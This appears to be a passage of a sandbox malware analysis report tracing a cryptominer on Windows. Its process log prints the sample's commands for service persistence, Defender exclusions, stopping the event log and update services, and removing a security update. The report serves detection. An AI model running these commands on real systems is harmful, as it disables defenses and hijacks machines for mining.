                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:21
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:22
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:23
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:24
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:25
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:26
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:27
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe delete "GeekBrains"
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:28
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:29
                                                                        Start time:04:35:57
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:30
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:31
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\winlogon.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:winlogon.exe
                                                                        Imagebase:0x7ff6156c0000
                                                                        File size:906'240 bytes
                                                                        MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:32
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:33
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe start "GeekBrains"
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:34
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:35
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:36
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\ProgramData\Screenshots\Lightshot.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\ProgramData\Screenshots\Lightshot.exe
                                                                        Imagebase:0x7ff7b1c80000
                                                                        File size:2'876'416 bytes
                                                                        MD5 hash:990A3F3B1273510F210FB9B541DA219F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 66%, ReversingLabs
                                                                        Has exited:true

                                                                        Target ID:37
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:38
                                                                        Start time:04:35:58
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:39
                                                                        Start time:04:35:59
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\lsass.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                        Imagebase:0x7ff654c90000
                                                                        File size:59'456 bytes
                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:40
                                                                        Start time:04:35:59
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:41
                                                                        Start time:04:35:59
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dwm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"dwm.exe"
                                                                        Imagebase:0x7ff79d4a0000
                                                                        File size:94'720 bytes
                                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:42
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff747680000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:43
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:44
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:45
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:46
                                                                        Start time:04:36:00
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\wusa.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff7bb240000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:47
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:48
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:49
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:50
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:51
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:52
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:53
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:54
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:55
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:56
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:57
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:58
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:59
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:60
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:61
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:62
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:63
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:64
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:65
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                        Has exited:false

                                                                        Target ID:66
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:67
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:68
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:69
                                                                        Start time:04:36:03
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false


                                                                          Execution Graph

                                                                          Execution Coverage:5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:21.8%
                                                                          Total number of Nodes:174
                                                                          Total number of Limit Nodes:2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 2643109117-1582277970
                                                                          • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction ID: b2a94d7747a335c025be608e53e8545787abd3978ed2ead544d536688e354d96
                                                                          • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction Fuzzy Hash: 01411931A09616C5F644BB1DE990379ABA5BF45788FD48433EA4D837B6DF3CA8418322

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtSetSystemPowerState.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EB901156), ref: 00007FF7EB9013F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: PowerStateSystem
                                                                          • String ID:
                                                                          • API String ID: 3171559674-0
                                                                          • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
